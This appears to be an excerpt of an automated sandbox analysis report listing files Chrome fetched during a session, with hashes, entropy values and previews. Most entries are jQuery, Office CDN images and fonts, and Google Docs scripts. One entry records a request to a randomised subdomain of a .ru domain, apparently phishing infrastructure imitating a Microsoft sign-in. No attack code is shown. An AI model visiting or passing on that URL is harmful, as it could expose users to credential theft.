                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:1
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1143 x 794, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):383270
                                                                                        Entropy (8bit):7.988693191327277
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:TPRLLUNp5X4PgHMt6rH4wJKdPUQ8hR8YXR+JQKFTRvMqtpKyg9N/hTWjrA3S1SmI:hYNTIP/wJuMQ8hR8YXR+JQK3gz/JGA3t
                                                                                        MD5:7B89E7B9A1E5F0E2AD529D5A85E1ACB7
                                                                                        SHA1:304ECC4375129D905E70AFE830E998470DADECD9
                                                                                        SHA-256:1329D493F7D313CA0026EB2664D1AACECBCA82D5BE70F692DD61C980F3BB16BE
                                                                                        SHA-512:F35C28AC263F1C8A16385D6624D33D0EBCA72F0F959DA654C5B552D5B23EDF41A16D922A9FB6AAFD408AF7E2721D42C0145D99E6B8BC462679FADBEF2C484BA4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-1-mreb-7b89e7b9a1.png
                                                                                        Preview:.PNG........IHDR...w..........b......pHYs.........&.:4....sRGB.........gAMA......a....IDATx...{.o.U....~.q.>.z.....*W...1.1...$.N...L...%...*.)..{...J]....i!.-uh!ZJB......4j.....@$l.:..7.....5z.5.s......~.:...~.S..[k..Zk....5.D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):312347
                                                                                        Entropy (8bit):4.963331896175029
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:fatv3K+OUvqMRPAwm+pzb87Id++JPBVegyMW:fatv3K+OUvqMRPAwm+pzb8M++DW
                                                                                        MD5:DF13ED7148FA106304AD51F4EC88A399
                                                                                        SHA1:5F3D04239BCB5A7EB1F963EAE8541EFD7CFEFD20
                                                                                        SHA-256:E9B2945B0BED2AD903FD8F97959954FF7CF552F52B3991536307D7D50146BDF2
                                                                                        SHA-512:DE8752B5C4E60099FBBEC0A98AD039661E71C57C4586CA8FA9D6EA55BDBBAEACBE7DC382AA9B25C02E1F7D3B2EDFE8C44598A7ED956743A2CFED3F76A90F2649
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://docs.google.com/static/drawings/client/css/2711563905-preview_css_ltr.css
                                                                                        Preview:.jfk-butterBar{border-radius:2px;box-shadow:0 2px 4px rgba(0,0,0,.2);transition:all 0s linear 1s,opacity 1s;border-style:solid;border-width:0;font-size:11px;height:0;opacity:0;visibility:hidden;overflow:hidden;padding:0;text-align:center}.jfk-butterBar-info{background-color:#f9edbe;border-color:#f0c36d;color:#333}.jfk-butterBar-error{background-color:#484848;border-color:#202020;color:#fff}.jfk-butterBar-promo{background-color:#d6e9f8;border-color:#4d90f0;color:#333}.jfk-butterBar-warning{background-color:#dd4b39;border-color:#602019;color:#fff}.jfk-butterBar-shown{transition:opacity .218s;border-width:1px;min-height:14px;height:auto;opacity:1;visibility:visible;padding:6px 16px}.jfk-butterBar-mini.jfk-butterBar-shown{padding:2px 16px}.docs-butterbar-container{font-weight:500;height:0;position:absolute;text-align:center;top:32px;width:100%;z-index:1004}.docs-hub-butterbar{top:57px}.docs-gm .docs-butterbar-container{font-weight:400}.docs-butterbar-container.docs-butterbar-container-comp
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3186)
                                                                                        Category:dropped
                                                                                        Size (bytes):143075
                                                                                        Entropy (8bit):5.4700294065957
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:kz8MS1nX3RxlVXX1QeWazWbfXfCx6SIlslUHT6gIdsh9Mvw6JzMQcl5llyYQxnFz:kMnOeSeyz6gqvQHl4V1Z
                                                                                        MD5:356FD4E5D2CAF3AB88331A70A0CB4B7B
                                                                                        SHA1:86E3A4BB181396C9C8283A7277111A48A5164037
                                                                                        SHA-256:7DC6F57FA058E1EEDE50CC280D42B2A513EC504D46ADC1CB313EE6E7F9E2EBEB
                                                                                        SHA-512:744D657FFD6034045D1F974347FF5926803CB6BE742A7653DD048E631EA4C1F79EAB14E9AF3B68C020447721DD5D81782A7FF34F34C9F52261A63C18E4DCE970
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:function _F_toggles_initialize(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]}_F_toggles_initialize([]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="Edge",ba="Error in protected function: ",ca="Missing error cause.",da="Not available",ea="SCRIPT",fa="_/wa/",ha="apps_telemetry.processed",ia="attributionsrc",ja="bigint",ka="boolean",la="buildLabel",ma="complete",na="error",pa="fatal",n="function",qa="gssmodulesetproto",ra="iPad",sa="iPod",ta="incident",ua="jsaction",va="kaspersky-labs",wa="neurosurgeonundergo",r="number",u="object",xa="prerender",ya="severity",za="severity-unprefixed",w="string",Aa="success",Ba="true",Ca="unhandledrejection";.function Da(){return function(a){return a}}function x(){return function(){}}function Ea(a){return function(){return this[a]}}function Fa(a){return function(){return a}}var y;function Ga(a){var c=0;return function(){return c<a.length?{done:!1,value:a
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 11356, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):11356
                                                                                        Entropy (8bit):7.9788069780762
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:bkChSYgOv8Dxgh8lDxlYOT9hNP84LmuuDm3TyRKySHvJWcUihSCtv46A4oNr8oYe:hM8kzlVlz5X08muW2TykySHBAeU4SnYe
                                                                                        MD5:DAC73DC7B1EB35CD360DA41648DE072B
                                                                                        SHA1:DA1F6A5F46B72320A55B398F5F66D5E9AA6132F1
                                                                                        SHA-256:2CD3EF7B5B677B7827BFBE5B926A283E7CA687DDB6B021FA4289630671EBD061
                                                                                        SHA-512:366155FF687C7892AABD45C875F6D9D695AFDC247B807B18094C18ABD4BF6E415E9C78CE2EDE4076C378E659C51B1050C10323572E728B6E179F8ED1CD4A6057
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                                                                                        Preview:wOF2......,\......W...+.........................?FFTM..&..... .`..z......d.J.....6.$.... ..y..r..K5l[....@...*...f..{0......t..T.@u...@Le..Yt..+.Z...E<.v{.k/.....p..1..e.z-:.....&.O.=...m..X.....{.7.?2...P%.7.k.s.....$..y]V.>Hj.d..!f....g..C....k....6TL"..$r.6.Qc...j....tt[(.....P....7....2j.1.\.nN.u."6....4.}Yl.Ql+7l..O}.:..SqZ.r...`._@...y.m.!.n@.....z.]i. .?..s{.g.Q...'. ?l.$A..o.,j.m..-.+..H.4}{...7....3...u....|..i*..'#.y[.M.......f...]A.JS~..:6.......T...'.....yU..,]|.....,g.T......P..d^..WEy<.%..*...5JT....H...tZ..E..xA.]r.]..z.qU..X.....P.*Yp..d..E.G...TX.......#(...........0..h]..Ns.....|.<....9..m.P....J....X$F.7P....?..s..XY..|{+n{\...s...e\.."....q.y.F8.......x...:.W..... ~.o. .<NT..:.........}.?._:.@q.6..=..@.#:.a:..Rb....V./]U..6.Mz..Iw.3.Y.,{60........R..........k>0..d..a`<1n8........g....k..........{...........U.i...>.mOK..e.6s)...JSF..........o'..|...0G_N...........D....yh;.S..xf...J...q..u.n.Z..<..>.......|...~..*..1...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                        Category:dropped
                                                                                        Size (bytes):47692
                                                                                        Entropy (8bit):5.4016459163756165
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.5
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H+rYn:D
                                                                                        MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                        SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                        SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                        SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnrzGZopJjrfRIFDTcwqTA=?alt=proto
                                                                                        Preview:CgkKBw03MKkwGgA=
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):97741
                                                                                        Entropy (8bit):5.317413225936828
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yomI9/afvZtvdKJiT315bQNrkSGQSv921rl1:aI9CfPciD158NrkO1
                                                                                        MD5:C57CC11A511063B808F4A2C7745DF8D0
                                                                                        SHA1:CEB6E14B7520A995C7E9C3BB6F3C1DCD56CCB5EE
                                                                                        SHA-256:65628140B0930C3F9ED1A06A8F30F454245A08665047C6A95B592DFD164F4E9F
                                                                                        SHA-512:CA8C7FCB456D3819FBA65A5040547D5A169FC5BDA9F1EA8479EA75C0580A57D02DC07525445F9FA7EC0D09CF2F38A6B8F71F297F715A0059AB8786D5D85BF948
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/bundles/otel-logger-cdec0b6428c58e375482.js
                                                                                        Preview:(()=>{"use strict";var e={},n={};function t(r){var i=n[r];if(void 0!==i)return i.exports;var o=n[r]={id:r,loaded:!1,exports:{}};return e[r](o,o.exports,t),o.loaded=!0,o.exports}t.m=e,(()=>{var e,n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__;t.t=function(r,i){if(1&i&&(r=this(r)),8&i)return r;if("object"==typeof r&&r){if(4&i&&r.__esModule)return r;if(16&i&&"function"==typeof r.then)return r}var o=Object.create(null);t.r(o);var a={};e=e||[null,n({}),n([]),n(n)];for(var u=2&i&&r;"object"==typeof u&&!~e.indexOf(u);u=n(u))Object.getOwnPropertyNames(u).forEach((e=>a[e]=()=>r[e]));return a.default=()=>r,t.d(o,a),o}})(),(()=>{t.d=(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})}})(),(()=>{t.f={},t.e=e=>Promise.all(Object.keys(t.f).reduce(((n,r)=>(t.f[r](e,n),n)),[]))})(),(()=>{t.u=e=>"inline.text-encoder-lite.chunk.js"})(),(()=>{t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("retur
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1119 x 704, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):591728
                                                                                        Entropy (8bit):7.996032737804013
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:BzVysRpODYLFLYXMaM48blnrCrjueL1oETab46OxEdB7ny2Q7e/:rODoSMcImr71eUXEPnBQq/
                                                                                        MD5:8977DBD5387860CD8344B51DC4F00216
                                                                                        SHA1:A0BCA65DE5D325B87EBDED22EC2EE9F459EED2DB
                                                                                        SHA-256:6EA50E423008D71C95B019385D8A3D018DE4B9735870224B49EBA9B2E2A0263B
                                                                                        SHA-512:EAEC056E681DFAC5CDEFBA16A1AB20CBDBD736AC77D14F018FD6C371F2D6C1F81ED46353B7661BB2E326A89E608D5B2B9097A0AD0F7ADF4DEF682AE835D75B13
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-1-mreb-8977dbd538.png
                                                                                        Preview:.PNG........IHDR..._.........E:......pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...I.mKr&.....9.{.....H.I1.Y.T.RBB@....h....@....j.Y.......5......T....lX.....|.........?3...9.y$.n.W.nnnn..,o.&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L...L..:`....~|s.....UV^IX.)?K).=+.y..w....j.[.e..2..%_...9._IJ...z=.G.Z..`...g...r...[...{....w(..?..1<%r..........w.&...`.~...&L.0a..3..-.................x...X..^...Z.......5.<..'O...+9\.,......9.0....=oN."....b._.{Zy.X.{I.e{.].......!...=.ER.-m.G.y...o...<.V`.?..i-...z.~.5...[.V..0-k*{...2....}J...ij..&%.R...+%.K.wz...r'Fy~....s.ZQ.gMYR}O%C.S)=......GO....\./.Zo...q.x7.dY.......g....w.Y.\x.....R.J..S...\.,.b......S.{J.?..[.M../.s......t....M..\.?P...W.&O8......W.....&u%.....A
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):4565
                                                                                        Entropy (8bit):7.879534543139402
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                        MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                        SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                        SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                        SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                        Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1440 x 1001, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):881847
                                                                                        Entropy (8bit):7.9872299190546325
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:TB1iSAc4Ggpqd2NIBvRQe/1XlenDK78I5lFDh:TBEcoQ2qBvRL1XIg8I5F
                                                                                        MD5:575EB26CF254E560FAB26BE95EF3A5EA
                                                                                        SHA1:6D2188018E9C82D3571F68E0AC8E90A93D40BDCD
                                                                                        SHA-256:A86828D13978FF8C8E6512764E5DA862E868CE8B57A8316825FF91511D7A7069
                                                                                        SHA-512:E0564E4A1382E19FF2ADBB09F6CDEDDF02BAA4307A05A86A38A32CF644181DB44325BC787FB3C0022583DFCDEFB9744E40448BCF771CDA4D79AB163C1C0FB5D2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR..............'.V....pHYs.................sRGB.........gAMA......a...tLIDATx.....$.y..>q.uvu..@.q.......4").+J"e[.Mi...d.f<.S.=;.4....3.l..xe.sH.a.c[.F.). @...........3.}./2...2....`.|.d"3.../..;...... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru/evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK
                                                                                        Preview:1
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):251464
                                                                                        Entropy (8bit):5.983609623990004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nMPvxEWQIGKwqfsCbL8IcfD4eeC6TahNXrozt135uSMgttkwhf8Q:nCvCj7gsdgvMSDtt3F8Q
                                                                                        MD5:9299D81EAABDBB856AB23BE6A57F444F
                                                                                        SHA1:6C87AF0395C5838B832472845732EF5690C224B5
                                                                                        SHA-256:F643529F69D88A9255A826EC3A18659B70456141E5EC6BAD94CAFB687EC5543C
                                                                                        SHA-512:BF0F3617226894E98D7AAADDF786D333BA0A7F4F970C64241526FA1FC9EF724A4B3952EE322208A2BB1A36A9EAA7D016C5D0C7B53032EB705DD77DA8A26758A3
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/bundles/unauth-9299d81eaa.css
                                                                                        Preview:.ms-Icon,.ms-ohp-Icon,.ms-ohp-Icon:before{speak:none;font-variant:normal;text-transform:none;line-height:1em;-webkit-font-smoothing:antialiased;font-weight:400;vertical-align:middle}@font-face{font-family:office365icons;src:url(/css/webfonts/office365icons.eot?);src:url(data:application/octet-stream;base64,d09GRgABAAAAACtMAA4AAAAARkgAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEQAAABWNeFFDWNtYXAAAAGIAAAAlAAAAeLMcNF9Y3Z0IAAAAhwAAAAUAAAAHAZN/5hmcGdtAAACMAAABPkAAAmRigp4O2dhc3AAAAcsAAAACAAAAAgAAAAQZ2x5ZgAABzQAACApAAAzHCacVyhoZWFkAAAnYAAAAC8AAAA2FCD/dWhoZWEAACeQAAAAHgAAACQOdQqHaG10eAAAJ7AAAAAuAAAAiI66AABsb2NhAAAn4AAAAEYAAABGtGSoRG1heHAAACgoAAAAIAAAACACAwrCbmFtZQAAKEgAAAGUAAADFTJUT1dwb3N0AAAp3AAAARYAAAGQtCqpVXByZXAAACr0AAAAVgAAAFaSoZr/eJxjYGQxZpzAwMrAwVTFtIeBgaEHQjM+YDBkZGJgYGJgZWbACgLSXFMYHB4wPZ7AHPQ/iyGKmZfBFyjMCJIDANapC2B4nGNgYGBmgGAZBkYGELgD5DGC+SwMB4C0DoMCkMXDwPCA6YHYA6cHXg9CHyQ9SHnQ8aDrwdYHOx9KPEx4OPORyiP3RxGPKx/3PJ7w/z/IGKyqt6OpbnrcD1It/1/+jfxB+V3yG+SXyC+Wb5Cvlw+VD5H7Jrderlz2rexp2d0y
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3186)
                                                                                        Category:downloaded
                                                                                        Size (bytes):143075
                                                                                        Entropy (8bit):5.4700294065957
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:kz8MS1nX3RxlVXX1QeWazWbfXfCx6SIlslUHT6gIdsh9Mvw6JzMQcl5llyYQxnFz:kMnOeSeyz6gqvQHl4V1Z
                                                                                        MD5:356FD4E5D2CAF3AB88331A70A0CB4B7B
                                                                                        SHA1:86E3A4BB181396C9C8283A7277111A48A5164037
                                                                                        SHA-256:7DC6F57FA058E1EEDE50CC280D42B2A513EC504D46ADC1CB313EE6E7F9E2EBEB
                                                                                        SHA-512:744D657FFD6034045D1F974347FF5926803CB6BE742A7653DD048E631EA4C1F79EAB14E9AF3B68C020447721DD5D81782A7FF34F34C9F52261A63C18E4DCE970
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://docs.google.com/static/drawings/client/js/750391780-preview_integrated_core_integrated.js
                                                                                        Preview:function _F_toggles_initialize(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]}_F_toggles_initialize([]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="Edge",ba="Error in protected function: ",ca="Missing error cause.",da="Not available",ea="SCRIPT",fa="_/wa/",ha="apps_telemetry.processed",ia="attributionsrc",ja="bigint",ka="boolean",la="buildLabel",ma="complete",na="error",pa="fatal",n="function",qa="gssmodulesetproto",ra="iPad",sa="iPod",ta="incident",ua="jsaction",va="kaspersky-labs",wa="neurosurgeonundergo",r="number",u="object",xa="prerender",ya="severity",za="severity-unprefixed",w="string",Aa="success",Ba="true",Ca="unhandledrejection";.function Da(){return function(a){return a}}function x(){return function(){}}function Ea(a){return function(){return this[a]}}function Fa(a){return function(){return a}}var y;function Ga(a){var c=0;return function(){return c<a.length?{done:!1,value:a
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1440 x 1001, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):881847
                                                                                        Entropy (8bit):7.9872299190546325
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:TB1iSAc4Ggpqd2NIBvRQe/1XlenDK78I5lFDh:TBEcoQ2qBvRL1XIg8I5F
                                                                                        MD5:575EB26CF254E560FAB26BE95EF3A5EA
                                                                                        SHA1:6D2188018E9C82D3571F68E0AC8E90A93D40BDCD
                                                                                        SHA-256:A86828D13978FF8C8E6512764E5DA862E868CE8B57A8316825FF91511D7A7069
